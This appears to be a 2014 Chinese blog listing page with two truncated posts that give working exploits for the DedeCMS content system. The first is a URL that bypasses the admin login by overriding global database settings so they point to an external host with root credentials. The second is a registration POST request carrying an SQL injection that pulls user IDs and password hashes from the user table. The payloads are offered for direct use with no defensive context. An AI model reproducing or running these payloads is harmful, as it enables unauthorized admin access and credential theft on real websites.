• 把以下代码中的:validate=dcug 改为当前的验证码,即可直接进入网站后台,此漏洞的前提是必须得到后台路径才能实现。 http://www.123.com/织梦网站后台/login.php?dopost=login &validate=dcug&userid=admin&pwd=inimda &_POST[GLOBALS][cfg_dbhost]=116.255.183.90 &_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0 &_POST[...
    作者:熊猫| 发布:2014年2月21日| 阅读:3,313次| 分类:PHP, 漏洞列表, 编程语言| 标签:
  • member/reg_new.php POST dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA &mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r &uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss &email=sss%40ss.ss&safequestion=0&safeanswer= &sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `dede...
    作者:熊猫| 发布:2014年2月21日| 阅读:2,621次| 分类:PHP, 漏洞列表, 编程语言| 标签:,